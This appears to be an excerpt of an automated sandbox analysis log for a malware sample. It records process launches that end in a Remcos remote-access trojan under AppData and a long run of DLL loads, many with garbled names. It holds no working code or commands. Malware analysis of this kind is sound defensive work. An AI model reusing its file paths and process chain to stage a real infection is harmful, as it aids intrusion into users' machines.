              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" Jump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: eamsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
